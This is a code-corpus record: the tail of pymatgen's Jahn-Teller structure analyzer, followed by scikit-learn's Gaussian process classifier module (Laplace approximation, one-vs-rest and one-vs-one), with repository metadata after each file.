to match an octahedral or tetrahedral motif, since Jahn-Teller structures
can often be
quite distorted, this threshold is smaller than one might expect
Returns:
analysis of structure, with key 'strength' which may be 'none', 'strong',
'weak', or 'unknown' (Default value = 0.1)
"""
return self.get_analysis_and_structure(
structure,
calculate_valences=calculate_valences,
guesstimate_spin=guesstimate_spin,
op_threshold=op_threshold,
)[0]
def is_jahn_teller_active(
self,
structure: Structure,
calculate_valences: bool = True,
guesstimate_spin: bool = False,
op_threshold: float = 0.1,
) -> bool:
"""
Convenience method, uses get_analysis_and_structure method.
Check if a given structure and if it may be Jahn-Teller
active or not. This is a heuristic, and may give false positives and
false negatives (false positives are preferred).
Args:
structure: input structure
calculate_valences: whether to attempt to calculate valences or not, structure
should have oxidation states to perform analysis (Default value = True)
guesstimate_spin: whether to guesstimate spin state from magnetic moments
or not, use with caution (Default value = False)
op_threshold: threshold for order parameter above which to consider site
to match an octahedral or tetrahedral motif, since Jahn-Teller structures
can often be
quite distorted, this threshold is smaller than one might expect
Returns:
boolean, True if might be Jahn-Teller active, False if not
"""
active = False
try:
analysis = self.get_analysis(
structure,
calculate_valences=calculate_valences,
guesstimate_spin=guesstimate_spin,
op_threshold=op_threshold,
)
active = analysis["active"]
except Exception as e:
warnings.warn("Error analyzing {}: {}".format(structure.composition.reduced_formula, e))
return active
def tag_structure(
self,
structure: Structure,
calculate_valences: bool = True,
guesstimate_spin: bool = False,
op_threshold: float = 0.1,
) -> Structure:
"""
Convenience method, uses get_analysis_and_structure method.
Add a "possible_jt_active" site property on Structure.
Args:
structure: input structure
calculate_valences: whether to attempt to calculate valences or not, structure
should have oxidation states to perform analysis (Default value = True)
guesstimate_spin: whether to guesstimate spin state from magnetic moments
or not, use with caution (Default value = False)
op_threshold: threshold for order parameter above which to consider site
to match an octahedral or tetrahedral motif, since Jahn-Teller structures
can often be
quite distorted, this threshold is smaller than one might expect
Returns:
Decorated Structure, will be in primitive setting.
"""
try:
analysis, structure = self.get_analysis_and_structure(
structure,
calculate_valences=calculate_valences,
guesstimate_spin=guesstimate_spin,
op_threshold=op_threshold,
)
jt_sites = [False] * len(structure)
if analysis["active"]:
for site in analysis["sites"]:
for index in site["site_indices"]:
jt_sites[index] = True
structure.add_site_property("possible_jt_active", jt_sites)
return structure
except Exception as e:
warnings.warn("Error analyzing {}: {}".format(structure.composition.reduced_formula, e))
return structure
@staticmethod
def _get_number_of_d_electrons(species: Species) -> float:
"""
Get number of d electrons of a species.
Args:
species: Species object
Returns: Number of d electrons.
"""
# TODO: replace with more generic Hund's rule algorithm?
# taken from get_crystal_field_spin
elec = species.full_electronic_structure
if len(elec) < 4 or elec[-1][1] != "s" or elec[-2][1] != "d":
raise AttributeError("Invalid element {} for crystal field calculation.".format(species.symbol))
nelectrons = int(elec[-1][2] + elec[-2][2] - species.oxi_state)
if nelectrons < 0 or nelectrons > 10:
raise AttributeError("Invalid oxidation state {} for element {}".format(species.oxi_state, species.symbol))
return nelectrons
def get_magnitude_of_effect_from_species(self, species: Union[str, Species], spin_state: str, motif: str) -> str:
"""
Get magnitude of Jahn-Teller effect from provided species, spin state and motif.
Args:
species: e.g. Fe2+
spin_state: "high" or "low"
motif: "oct" or "tet"
Returns: "none", "weak" or "strong
"""
magnitude = "none"
sp = get_el_sp(species)
# has to be Species; we need to know the oxidation state
if isinstance(sp, Species) and sp.element.is_transition_metal:
d_electrons = self._get_number_of_d_electrons(sp)
if motif in self.spin_configs:
if spin_state not in self.spin_configs[motif][d_electrons]:
spin_state = self.spin_configs[motif][d_electrons]["default"]
spin_config = self.spin_configs[motif][d_electrons][spin_state]
magnitude = JahnTellerAnalyzer.get_magnitude_of_effect_from_spin_config(motif, spin_config)
else:
warnings.warn("No data for this species.")
return magnitude
@staticmethod
def get_magnitude_of_effect_from_spin_config(motif: str, spin_config: Dict[str, float]) -> str:
"""
Roughly, the magnitude of Jahn-Teller distortion will be:
* in octahedral environments, strong if e_g orbitals
unevenly occupied but weak if t_2g orbitals unevenly
occupied
* in tetrahedral environments always weaker
Args:
motif: "oct" or "tet"
spin_config: dict of 'e' (e_g) and 't' (t2_g)
with number of electrons in each state
Returns: "none", "weak" or "strong"
"""
magnitude = "none"
if motif == "oct":
e_g = spin_config["e_g"]
t_2g = spin_config["t_2g"]
if (e_g % 2 != 0) or (t_2g % 3 != 0):
magnitude = "weak"
if e_g % 2 == 1:
magnitude = "strong"
elif motif == "tet":
e = spin_config["e"]
t_2 = spin_config["t_2"]
if (e % 3 != 0) or (t_2 % 2 != 0):
magnitude = "weak"
return magnitude
@staticmethod
def _estimate_spin_state(species: Union[str, Species], motif: str, known_magmom: float) -> str:
"""Simple heuristic to estimate spin state. If magnetic moment
is sufficiently close to that predicted for a given spin state,
we assign it that state. If we only have data for one spin
state then that's the one we use (e.g. we assume all tetrahedral
complexes are high-spin, since this is typically the case).
Args:
species: str or Species
motif: "oct" or "tet"
known_magmom: magnetic moment in Bohr magnetons
Returns: "undefined" (if only one spin state possible), "low",
"high" or "unknown"
"""
mu_so_high = JahnTellerAnalyzer.mu_so(species, motif=motif, spin_state="high")
mu_so_low = JahnTellerAnalyzer.mu_so(species, motif=motif, spin_state="low")
if mu_so_high == mu_so_low:
return "undefined" # undefined or only one spin state possible
if mu_so_high is None:
return "low"
if mu_so_low is None:
return "high"
diff = mu_so_high - mu_so_low
# WARNING! this heuristic has not been robustly tested or benchmarked
# using 'diff*0.25' as arbitrary measure, if known magmom is
# too far away from expected value, we don't try to classify it
if known_magmom > mu_so_high or abs(mu_so_high - known_magmom) < diff * 0.25:
return "high"
if known_magmom < mu_so_low or abs(mu_so_low - known_magmom) < diff * 0.25:
return "low"
return "unknown"
@staticmethod
def mu_so(species: Union[str, Species], motif: str, spin_state: str) -> Optional[float]:
"""Calculates the spin-only magnetic moment for a
given species. Only supports transition metals.
Args:
species: Species
motif: "oct" or "tet"
spin_state: "high" or "low"
Returns:
Spin-only magnetic moment in Bohr magnetons or None if
species crystal field not defined
"""
try:
sp = get_el_sp(species)
n = sp.get_crystal_field_spin(coordination=motif, spin_config=spin_state)
# calculation spin-only magnetic moment for this number of unpaired spins
return np.sqrt(n * (n + 2))
except AttributeError:
return None
|
gmatteo/pymatgen
|
pymatgen/analysis/magnetism/jahnteller.py
|
Python
|
mit
| 20,445
|
[
"CRYSTAL",
"pymatgen"
] |
5a76833640aec69d63e1a8eb59ece7281c0eb73facdb7f80f82e4e70c7b20579
|
"""Gaussian processes classification."""
# Authors: Jan Hendrik Metzen <jhm@informatik.uni-bremen.de>
#
# License: BSD 3 clause
from operator import itemgetter
import numpy as np
from scipy.linalg import cholesky, cho_solve, solve
import scipy.optimize
from scipy.special import erf, expit
from ..base import BaseEstimator, ClassifierMixin, clone
from .kernels import RBF, CompoundKernel, ConstantKernel as C
from ..utils.validation import check_is_fitted
from ..utils import check_random_state
from ..utils.optimize import _check_optimize_result
from ..preprocessing import LabelEncoder
from ..multiclass import OneVsRestClassifier, OneVsOneClassifier
# Values required for approximating the logistic sigmoid by
# error functions. coefs are obtained via:
# x = np.array([0, 0.6, 2, 3.5, 4.5, np.inf])
# b = logistic(x)
# A = (erf(np.dot(x, self.lambdas)) + 1) / 2
# coefs = lstsq(A, b)[0]
LAMBDAS = np.array([0.41, 0.4, 0.37, 0.44, 0.39])[:, np.newaxis]
COEFS = np.array(
[-1854.8214151, 3516.89893646, 221.29346712, 128.12323805, -2010.49422654]
)[:, np.newaxis]
class _BinaryGaussianProcessClassifierLaplace(BaseEstimator):
"""Binary Gaussian process classification based on Laplace approximation.
The implementation is based on Algorithm 3.1, 3.2, and 5.1 of
``Gaussian Processes for Machine Learning'' (GPML) by Rasmussen and
Williams.
Internally, the Laplace approximation is used for approximating the
non-Gaussian posterior by a Gaussian.
Currently, the implementation is restricted to using the logistic link
function.
.. versionadded:: 0.18
Parameters
----------
kernel : kernel instance, default=None
The kernel specifying the covariance function of the GP. If None is
passed, the kernel "1.0 * RBF(1.0)" is used as default. Note that
the kernel's hyperparameters are optimized during fitting.
optimizer : 'fmin_l_bfgs_b' or callable, default='fmin_l_bfgs_b'
Can either be one of the internally supported optimizers for optimizing
the kernel's parameters, specified by a string, or an externally
defined optimizer passed as a callable. If a callable is passed, it
must have the signature::
def optimizer(obj_func, initial_theta, bounds):
# * 'obj_func' is the objective function to be maximized, which
# takes the hyperparameters theta as parameter and an
# optional flag eval_gradient, which determines if the
# gradient is returned additionally to the function value
# * 'initial_theta': the initial value for theta, which can be
# used by local optimizers
# * 'bounds': the bounds on the values of theta
....
# Returned are the best found hyperparameters theta and
# the corresponding value of the target function.
return theta_opt, func_min
Per default, the 'L-BFGS-B' algorithm from scipy.optimize.minimize
is used. If None is passed, the kernel's parameters are kept fixed.
Available internal optimizers are::
'fmin_l_bfgs_b'
n_restarts_optimizer : int, default=0
The number of restarts of the optimizer for finding the kernel's
parameters which maximize the log-marginal likelihood. The first run
of the optimizer is performed from the kernel's initial parameters,
the remaining ones (if any) from thetas sampled log-uniform randomly
from the space of allowed theta-values. If greater than 0, all bounds
must be finite. Note that n_restarts_optimizer=0 implies that one
run is performed.
max_iter_predict : int, default=100
The maximum number of iterations in Newton's method for approximating
the posterior during predict. Smaller values will reduce computation
time at the cost of worse results.
warm_start : bool, default=False
If warm-starts are enabled, the solution of the last Newton iteration
on the Laplace approximation of the posterior mode is used as
initialization for the next call of _posterior_mode(). This can speed
up convergence when _posterior_mode is called several times on similar
problems as in hyperparameter optimization. See :term:`the Glossary
<warm_start>`.
copy_X_train : bool, default=True
If True, a persistent copy of the training data is stored in the
object. Otherwise, just a reference to the training data is stored,
which might cause predictions to change if the data is modified
externally.
random_state : int, RandomState instance or None, default=None
Determines random number generation used to initialize the centers.
Pass an int for reproducible results across multiple function calls.
See :term: `Glossary <random_state>`.
Attributes
----------
X_train_ : array-like of shape (n_samples, n_features) or list of object
Feature vectors or other representations of training data (also
required for prediction).
y_train_ : array-like of shape (n_samples,)
Target values in training data (also required for prediction)
classes_ : array-like of shape (n_classes,)
Unique class labels.
kernel_ : kernl instance
The kernel used for prediction. The structure of the kernel is the
same as the one passed as parameter but with optimized hyperparameters
L_ : array-like of shape (n_samples, n_samples)
Lower-triangular Cholesky decomposition of the kernel in X_train_
pi_ : array-like of shape (n_samples,)
The probabilities of the positive class for the training points
X_train_
W_sr_ : array-like of shape (n_samples,)
Square root of W, the Hessian of log-likelihood of the latent function
values for the observed labels. Since W is diagonal, only the diagonal
of sqrt(W) is stored.
log_marginal_likelihood_value_ : float
The log-marginal-likelihood of ``self.kernel_.theta``
"""
def __init__(
self,
kernel=None,
*,
optimizer="fmin_l_bfgs_b",
n_restarts_optimizer=0,
max_iter_predict=100,
warm_start=False,
copy_X_train=True,
random_state=None,
):
self.kernel = kernel
self.optimizer = optimizer
self.n_restarts_optimizer = n_restarts_optimizer
self.max_iter_predict = max_iter_predict
self.warm_start = warm_start
self.copy_X_train = copy_X_train
self.random_state = random_state
def fit(self, X, y):
"""Fit Gaussian process classification model.
Parameters
----------
X : array-like of shape (n_samples, n_features) or list of object
Feature vectors or other representations of training data.
y : array-like of shape (n_samples,)
Target values, must be binary.
Returns
-------
self : returns an instance of self.
"""
if self.kernel is None: # Use an RBF kernel as default
self.kernel_ = C(1.0, constant_value_bounds="fixed") * RBF(
1.0, length_scale_bounds="fixed"
)
else:
self.kernel_ = clone(self.kernel)
self.rng = check_random_state(self.random_state)
self.X_train_ = np.copy(X) if self.copy_X_train else X
# Encode class labels and check that it is a binary classification
# problem
label_encoder = LabelEncoder()
self.y_train_ = label_encoder.fit_transform(y)
self.classes_ = label_encoder.classes_
if self.classes_.size > 2:
raise ValueError(
"%s supports only binary classification. y contains classes %s"
% (self.__class__.__name__, self.classes_)
)
elif self.classes_.size == 1:
raise ValueError(
"{0:s} requires 2 classes; got {1:d} class".format(
self.__class__.__name__, self.classes_.size
)
)
if self.optimizer is not None and self.kernel_.n_dims > 0:
# Choose hyperparameters based on maximizing the log-marginal
# likelihood (potentially starting from several initial values)
def obj_func(theta, eval_gradient=True):
if eval_gradient:
lml, grad = self.log_marginal_likelihood(
theta, eval_gradient=True, clone_kernel=False
)
return -lml, -grad
else:
return -self.log_marginal_likelihood(theta, clone_kernel=False)
# First optimize starting from theta specified in kernel
optima = [
self._constrained_optimization(
obj_func, self.kernel_.theta, self.kernel_.bounds
)
]
# Additional runs are performed from log-uniform chosen initial
# theta
if self.n_restarts_optimizer > 0:
if not np.isfinite(self.kernel_.bounds).all():
raise ValueError(
"Multiple optimizer restarts (n_restarts_optimizer>0) "
"requires that all bounds are finite."
)
bounds = self.kernel_.bounds
for iteration in range(self.n_restarts_optimizer):
theta_initial = np.exp(self.rng.uniform(bounds[:, 0], bounds[:, 1]))
optima.append(
self._constrained_optimization(obj_func, theta_initial, bounds)
)
# Select result from run with minimal (negative) log-marginal
# likelihood
lml_values = list(map(itemgetter(1), optima))
self.kernel_.theta = optima[np.argmin(lml_values)][0]
self.kernel_._check_bounds_params()
self.log_marginal_likelihood_value_ = -np.min(lml_values)
else:
self.log_marginal_likelihood_value_ = self.log_marginal_likelihood(
self.kernel_.theta
)
# Precompute quantities required for predictions which are independent
# of actual query points
K = self.kernel_(self.X_train_)
_, (self.pi_, self.W_sr_, self.L_, _, _) = self._posterior_mode(
K, return_temporaries=True
)
return self
def predict(self, X):
"""Perform classification on an array of test vectors X.
Parameters
----------
X : array-like of shape (n_samples, n_features) or list of object
Query points where the GP is evaluated for classification.
Returns
-------
C : ndarray of shape (n_samples,)
Predicted target values for X, values are from ``classes_``
"""
check_is_fitted(self)
# As discussed on Section 3.4.2 of GPML, for making hard binary
# decisions, it is enough to compute the MAP of the posterior and
# pass it through the link function
K_star = self.kernel_(self.X_train_, X) # K_star =k(x_star)
f_star = K_star.T.dot(self.y_train_ - self.pi_) # Algorithm 3.2,Line 4
return np.where(f_star > 0, self.classes_[1], self.classes_[0])
def predict_proba(self, X):
"""Return probability estimates for the test vector X.
Parameters
----------
X : array-like of shape (n_samples, n_features) or list of object
Query points where the GP is evaluated for classification.
Returns
-------
C : array-like of shape (n_samples, n_classes)
Returns the probability of the samples for each class in
the model. The columns correspond to the classes in sorted
order, as they appear in the attribute ``classes_``.
"""
check_is_fitted(self)
# Based on Algorithm 3.2 of GPML
K_star = self.kernel_(self.X_train_, X) # K_star =k(x_star)
f_star = K_star.T.dot(self.y_train_ - self.pi_) # Line 4
v = solve(self.L_, self.W_sr_[:, np.newaxis] * K_star) # Line 5
# Line 6 (compute np.diag(v.T.dot(v)) via einsum)
var_f_star = self.kernel_.diag(X) - np.einsum("ij,ij->j", v, v)
# Line 7:
# Approximate \int log(z) * N(z | f_star, var_f_star)
# Approximation is due to Williams & Barber, "Bayesian Classification
# with Gaussian Processes", Appendix A: Approximate the logistic
# sigmoid by a linear combination of 5 error functions.
# For information on how this integral can be computed see
# blitiri.blogspot.de/2012/11/gaussian-integral-of-error-function.html
alpha = 1 / (2 * var_f_star)
gamma = LAMBDAS * f_star
integrals = (
np.sqrt(np.pi / alpha)
* erf(gamma * np.sqrt(alpha / (alpha + LAMBDAS ** 2)))
/ (2 * np.sqrt(var_f_star * 2 * np.pi))
)
pi_star = (COEFS * integrals).sum(axis=0) + 0.5 * COEFS.sum()
return np.vstack((1 - pi_star, pi_star)).T
def log_marginal_likelihood(
self, theta=None, eval_gradient=False, clone_kernel=True
):
"""Returns log-marginal likelihood of theta for training data.
Parameters
----------
theta : array-like of shape (n_kernel_params,), default=None
Kernel hyperparameters for which the log-marginal likelihood is
evaluated. If None, the precomputed log_marginal_likelihood
of ``self.kernel_.theta`` is returned.
eval_gradient : bool, default=False
If True, the gradient of the log-marginal likelihood with respect
to the kernel hyperparameters at position theta is returned
additionally. If True, theta must not be None.
clone_kernel : bool, default=True
If True, the kernel attribute is copied. If False, the kernel
attribute is modified, but may result in a performance improvement.
Returns
-------
log_likelihood : float
Log-marginal likelihood of theta for training data.
log_likelihood_gradient : ndarray of shape (n_kernel_params,), \
optional
Gradient of the log-marginal likelihood with respect to the kernel
hyperparameters at position theta.
Only returned when `eval_gradient` is True.
"""
if theta is None:
if eval_gradient:
raise ValueError("Gradient can only be evaluated for theta!=None")
return self.log_marginal_likelihood_value_
if clone_kernel:
kernel = self.kernel_.clone_with_theta(theta)
else:
kernel = self.kernel_
kernel.theta = theta
if eval_gradient:
K, K_gradient = kernel(self.X_train_, eval_gradient=True)
else:
K = kernel(self.X_train_)
# Compute log-marginal-likelihood Z and also store some temporaries
# which can be reused for computing Z's gradient
Z, (pi, W_sr, L, b, a) = self._posterior_mode(K, return_temporaries=True)
if not eval_gradient:
return Z
# Compute gradient based on Algorithm 5.1 of GPML
d_Z = np.empty(theta.shape[0])
# XXX: Get rid of the np.diag() in the next line
R = W_sr[:, np.newaxis] * cho_solve((L, True), np.diag(W_sr)) # Line 7
C = solve(L, W_sr[:, np.newaxis] * K) # Line 8
# Line 9: (use einsum to compute np.diag(C.T.dot(C))))
s_2 = (
-0.5
* (np.diag(K) - np.einsum("ij, ij -> j", C, C))
* (pi * (1 - pi) * (1 - 2 * pi))
) # third derivative
for j in range(d_Z.shape[0]):
C = K_gradient[:, :, j] # Line 11
# Line 12: (R.T.ravel().dot(C.ravel()) = np.trace(R.dot(C)))
s_1 = 0.5 * a.T.dot(C).dot(a) - 0.5 * R.T.ravel().dot(C.ravel())
b = C.dot(self.y_train_ - pi) # Line 13
s_3 = b - K.dot(R.dot(b)) # Line 14
d_Z[j] = s_1 + s_2.T.dot(s_3) # Line 15
return Z, d_Z
def _posterior_mode(self, K, return_temporaries=False):
"""Mode-finding for binary Laplace GPC and fixed kernel.
This approximates the posterior of the latent function values for given
inputs and target observations with a Gaussian approximation and uses
Newton's iteration to find the mode of this approximation.
"""
# Based on Algorithm 3.1 of GPML
# If warm_start are enabled, we reuse the last solution for the
# posterior mode as initialization; otherwise, we initialize with 0
if (
self.warm_start
and hasattr(self, "f_cached")
and self.f_cached.shape == self.y_train_.shape
):
f = self.f_cached
else:
f = np.zeros_like(self.y_train_, dtype=np.float64)
# Use Newton's iteration method to find mode of Laplace approximation
log_marginal_likelihood = -np.inf
for _ in range(self.max_iter_predict):
# Line 4
pi = expit(f)
W = pi * (1 - pi)
# Line 5
W_sr = np.sqrt(W)
W_sr_K = W_sr[:, np.newaxis] * K
B = np.eye(W.shape[0]) + W_sr_K * W_sr
L = cholesky(B, lower=True)
# Line 6
b = W * f + (self.y_train_ - pi)
# Line 7
a = b - W_sr * cho_solve((L, True), W_sr_K.dot(b))
# Line 8
f = K.dot(a)
# Line 10: Compute log marginal likelihood in loop and use as
# convergence criterion
lml = (
-0.5 * a.T.dot(f)
- np.log1p(np.exp(-(self.y_train_ * 2 - 1) * f)).sum()
- np.log(np.diag(L)).sum()
)
# Check if we have converged (log marginal likelihood does
# not decrease)
# XXX: more complex convergence criterion
if lml - log_marginal_likelihood < 1e-10:
break
log_marginal_likelihood = lml
self.f_cached = f # Remember solution for later warm-starts
if return_temporaries:
return log_marginal_likelihood, (pi, W_sr, L, b, a)
else:
return log_marginal_likelihood
def _constrained_optimization(self, obj_func, initial_theta, bounds):
if self.optimizer == "fmin_l_bfgs_b":
opt_res = scipy.optimize.minimize(
obj_func, initial_theta, method="L-BFGS-B", jac=True, bounds=bounds
)
_check_optimize_result("lbfgs", opt_res)
theta_opt, func_min = opt_res.x, opt_res.fun
elif callable(self.optimizer):
theta_opt, func_min = self.optimizer(obj_func, initial_theta, bounds=bounds)
else:
raise ValueError("Unknown optimizer %s." % self.optimizer)
return theta_opt, func_min
class GaussianProcessClassifier(ClassifierMixin, BaseEstimator):
"""Gaussian process classification (GPC) based on Laplace approximation.
The implementation is based on Algorithm 3.1, 3.2, and 5.1 of
Gaussian Processes for Machine Learning (GPML) by Rasmussen and
Williams.
Internally, the Laplace approximation is used for approximating the
non-Gaussian posterior by a Gaussian.
Currently, the implementation is restricted to using the logistic link
function. For multi-class classification, several binary one-versus rest
classifiers are fitted. Note that this class thus does not implement
a true multi-class Laplace approximation.
Read more in the :ref:`User Guide <gaussian_process>`.
Parameters
----------
kernel : kernel instance, default=None
The kernel specifying the covariance function of the GP. If None is
passed, the kernel "1.0 * RBF(1.0)" is used as default. Note that
the kernel's hyperparameters are optimized during fitting.
optimizer : 'fmin_l_bfgs_b' or callable, default='fmin_l_bfgs_b'
Can either be one of the internally supported optimizers for optimizing
the kernel's parameters, specified by a string, or an externally
defined optimizer passed as a callable. If a callable is passed, it
must have the signature::
def optimizer(obj_func, initial_theta, bounds):
# * 'obj_func' is the objective function to be maximized, which
# takes the hyperparameters theta as parameter and an
# optional flag eval_gradient, which determines if the
# gradient is returned additionally to the function value
# * 'initial_theta': the initial value for theta, which can be
# used by local optimizers
# * 'bounds': the bounds on the values of theta
....
# Returned are the best found hyperparameters theta and
# the corresponding value of the target function.
return theta_opt, func_min
Per default, the 'L-BFGS-B' algorithm from scipy.optimize.minimize
is used. If None is passed, the kernel's parameters are kept fixed.
Available internal optimizers are::
'fmin_l_bfgs_b'
n_restarts_optimizer : int, default=0
The number of restarts of the optimizer for finding the kernel's
parameters which maximize the log-marginal likelihood. The first run
of the optimizer is performed from the kernel's initial parameters,
the remaining ones (if any) from thetas sampled log-uniform randomly
from the space of allowed theta-values. If greater than 0, all bounds
must be finite. Note that n_restarts_optimizer=0 implies that one
run is performed.
max_iter_predict : int, default=100
The maximum number of iterations in Newton's method for approximating
the posterior during predict. Smaller values will reduce computation
time at the cost of worse results.
warm_start : bool, default=False
If warm-starts are enabled, the solution of the last Newton iteration
on the Laplace approximation of the posterior mode is used as
initialization for the next call of _posterior_mode(). This can speed
up convergence when _posterior_mode is called several times on similar
problems as in hyperparameter optimization. See :term:`the Glossary
<warm_start>`.
copy_X_train : bool, default=True
If True, a persistent copy of the training data is stored in the
object. Otherwise, just a reference to the training data is stored,
which might cause predictions to change if the data is modified
externally.
random_state : int, RandomState instance or None, default=None
Determines random number generation used to initialize the centers.
Pass an int for reproducible results across multiple function calls.
See :term: `Glossary <random_state>`.
multi_class : {'one_vs_rest', 'one_vs_one'}, default='one_vs_rest'
Specifies how multi-class classification problems are handled.
Supported are 'one_vs_rest' and 'one_vs_one'. In 'one_vs_rest',
one binary Gaussian process classifier is fitted for each class, which
is trained to separate this class from the rest. In 'one_vs_one', one
binary Gaussian process classifier is fitted for each pair of classes,
which is trained to separate these two classes. The predictions of
these binary predictors are combined into multi-class predictions.
Note that 'one_vs_one' does not support predicting probability
estimates.
n_jobs : int, default=None
The number of jobs to use for the computation: the specified
multiclass problems are computed in parallel.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
Attributes
----------
base_estimator_ : ``Estimator`` instance
The estimator instance that defines the likelihood function
using the observed data.
kernel_ : kernel instance
The kernel used for prediction. In case of binary classification,
the structure of the kernel is the same as the one passed as parameter
but with optimized hyperparameters. In case of multi-class
classification, a CompoundKernel is returned which consists of the
different kernels used in the one-versus-rest classifiers.
log_marginal_likelihood_value_ : float
The log-marginal-likelihood of ``self.kernel_.theta``
classes_ : array-like of shape (n_classes,)
Unique class labels.
n_classes_ : int
The number of classes in the training data
n_features_in_ : int
Number of features seen during :term:`fit`.
.. versionadded:: 0.24
See Also
--------
GaussianProcessRegressor : Gaussian process regression (GPR).
Examples
--------
>>> from sklearn.datasets import load_iris
>>> from sklearn.gaussian_process import GaussianProcessClassifier
>>> from sklearn.gaussian_process.kernels import RBF
>>> X, y = load_iris(return_X_y=True)
>>> kernel = 1.0 * RBF(1.0)
>>> gpc = GaussianProcessClassifier(kernel=kernel,
... random_state=0).fit(X, y)
>>> gpc.score(X, y)
0.9866...
>>> gpc.predict_proba(X[:2,:])
array([[0.83548752, 0.03228706, 0.13222543],
[0.79064206, 0.06525643, 0.14410151]])
.. versionadded:: 0.18
"""
def __init__(
self,
kernel=None,
*,
optimizer="fmin_l_bfgs_b",
n_restarts_optimizer=0,
max_iter_predict=100,
warm_start=False,
copy_X_train=True,
random_state=None,
multi_class="one_vs_rest",
n_jobs=None,
):
self.kernel = kernel
self.optimizer = optimizer
self.n_restarts_optimizer = n_restarts_optimizer
self.max_iter_predict = max_iter_predict
self.warm_start = warm_start
self.copy_X_train = copy_X_train
self.random_state = random_state
self.multi_class = multi_class
self.n_jobs = n_jobs
def fit(self, X, y):
"""Fit Gaussian process classification model.
Parameters
----------
X : array-like of shape (n_samples, n_features) or list of object
Feature vectors or other representations of training data.
y : array-like of shape (n_samples,)
Target values, must be binary.
Returns
-------
self : object
Returns an instance of self.
"""
if self.kernel is None or self.kernel.requires_vector_input:
X, y = self._validate_data(
X, y, multi_output=False, ensure_2d=True, dtype="numeric"
)
else:
X, y = self._validate_data(
X, y, multi_output=False, ensure_2d=False, dtype=None
)
self.base_estimator_ = _BinaryGaussianProcessClassifierLaplace(
kernel=self.kernel,
optimizer=self.optimizer,
n_restarts_optimizer=self.n_restarts_optimizer,
max_iter_predict=self.max_iter_predict,
warm_start=self.warm_start,
copy_X_train=self.copy_X_train,
random_state=self.random_state,
)
self.classes_ = np.unique(y)
self.n_classes_ = self.classes_.size
if self.n_classes_ == 1:
raise ValueError(
"GaussianProcessClassifier requires 2 or more "
"distinct classes; got %d class (only class %s "
"is present)" % (self.n_classes_, self.classes_[0])
)
if self.n_classes_ > 2:
if self.multi_class == "one_vs_rest":
self.base_estimator_ = OneVsRestClassifier(
self.base_estimator_, n_jobs=self.n_jobs
)
elif self.multi_class == "one_vs_one":
self.base_estimator_ = OneVsOneClassifier(
self.base_estimator_, n_jobs=self.n_jobs
)
else:
raise ValueError("Unknown multi-class mode %s" % self.multi_class)
self.base_estimator_.fit(X, y)
if self.n_classes_ > 2:
self.log_marginal_likelihood_value_ = np.mean(
[
estimator.log_marginal_likelihood()
for estimator in self.base_estimator_.estimators_
]
)
else:
self.log_marginal_likelihood_value_ = (
self.base_estimator_.log_marginal_likelihood()
)
return self
def predict(self, X):
"""Perform classification on an array of test vectors X.
Parameters
----------
X : array-like of shape (n_samples, n_features) or list of object
Query points where the GP is evaluated for classification.
Returns
-------
C : ndarray of shape (n_samples,)
Predicted target values for X, values are from ``classes_``.
"""
check_is_fitted(self)
if self.kernel is None or self.kernel.requires_vector_input:
X = self._validate_data(X, ensure_2d=True, dtype="numeric", reset=False)
else:
X = self._validate_data(X, ensure_2d=False, dtype=None, reset=False)
return self.base_estimator_.predict(X)
def predict_proba(self, X):
"""Return probability estimates for the test vector X.
Parameters
----------
X : array-like of shape (n_samples, n_features) or list of object
Query points where the GP is evaluated for classification.
Returns
-------
C : array-like of shape (n_samples, n_classes)
Returns the probability of the samples for each class in
the model. The columns correspond to the classes in sorted
order, as they appear in the attribute :term:`classes_`.
"""
check_is_fitted(self)
if self.n_classes_ > 2 and self.multi_class == "one_vs_one":
raise ValueError(
"one_vs_one multi-class mode does not support "
"predicting probability estimates. Use "
"one_vs_rest mode instead."
)
if self.kernel is None or self.kernel.requires_vector_input:
X = self._validate_data(X, ensure_2d=True, dtype="numeric", reset=False)
else:
X = self._validate_data(X, ensure_2d=False, dtype=None, reset=False)
return self.base_estimator_.predict_proba(X)
@property
def kernel_(self):
"""Return the kernel of the base estimator."""
if self.n_classes_ == 2:
return self.base_estimator_.kernel_
else:
return CompoundKernel(
[estimator.kernel_ for estimator in self.base_estimator_.estimators_]
)
def log_marginal_likelihood(
self, theta=None, eval_gradient=False, clone_kernel=True
):
"""Return log-marginal likelihood of theta for training data.
In the case of multi-class classification, the mean log-marginal
likelihood of the one-versus-rest classifiers are returned.
Parameters
----------
theta : array-like of shape (n_kernel_params,), default=None
Kernel hyperparameters for which the log-marginal likelihood is
evaluated. In the case of multi-class classification, theta may
be the hyperparameters of the compound kernel or of an individual
kernel. In the latter case, all individual kernel get assigned the
same theta values. If None, the precomputed log_marginal_likelihood
of ``self.kernel_.theta`` is returned.
eval_gradient : bool, default=False
If True, the gradient of the log-marginal likelihood with respect
to the kernel hyperparameters at position theta is returned
additionally. Note that gradient computation is not supported
for non-binary classification. If True, theta must not be None.
clone_kernel : bool, default=True
If True, the kernel attribute is copied. If False, the kernel
attribute is modified, but may result in a performance improvement.
Returns
-------
log_likelihood : float
Log-marginal likelihood of theta for training data.
log_likelihood_gradient : ndarray of shape (n_kernel_params,), optional
Gradient of the log-marginal likelihood with respect to the kernel
hyperparameters at position theta.
Only returned when `eval_gradient` is True.
"""
check_is_fitted(self)
if theta is None:
if eval_gradient:
raise ValueError("Gradient can only be evaluated for theta!=None")
return self.log_marginal_likelihood_value_
theta = np.asarray(theta)
if self.n_classes_ == 2:
return self.base_estimator_.log_marginal_likelihood(
theta, eval_gradient, clone_kernel=clone_kernel
)
else:
if eval_gradient:
raise NotImplementedError(
"Gradient of log-marginal-likelihood not implemented for "
"multi-class GPC."
)
estimators = self.base_estimator_.estimators_
n_dims = estimators[0].kernel_.n_dims
if theta.shape[0] == n_dims: # use same theta for all sub-kernels
return np.mean(
[
estimator.log_marginal_likelihood(
theta, clone_kernel=clone_kernel
)
for i, estimator in enumerate(estimators)
]
)
elif theta.shape[0] == n_dims * self.classes_.shape[0]:
# theta for compound kernel
return np.mean(
[
estimator.log_marginal_likelihood(
theta[n_dims * i : n_dims * (i + 1)],
clone_kernel=clone_kernel,
)
for i, estimator in enumerate(estimators)
]
)
else:
raise ValueError(
"Shape of theta must be either %d or %d. "
"Obtained theta with shape %d."
% (n_dims, n_dims * self.classes_.shape[0], theta.shape[0])
)
|
shyamalschandra/scikit-learn
|
sklearn/gaussian_process/_gpc.py
|
Python
|
bsd-3-clause
| 35,129
|
[
"Gaussian"
] |
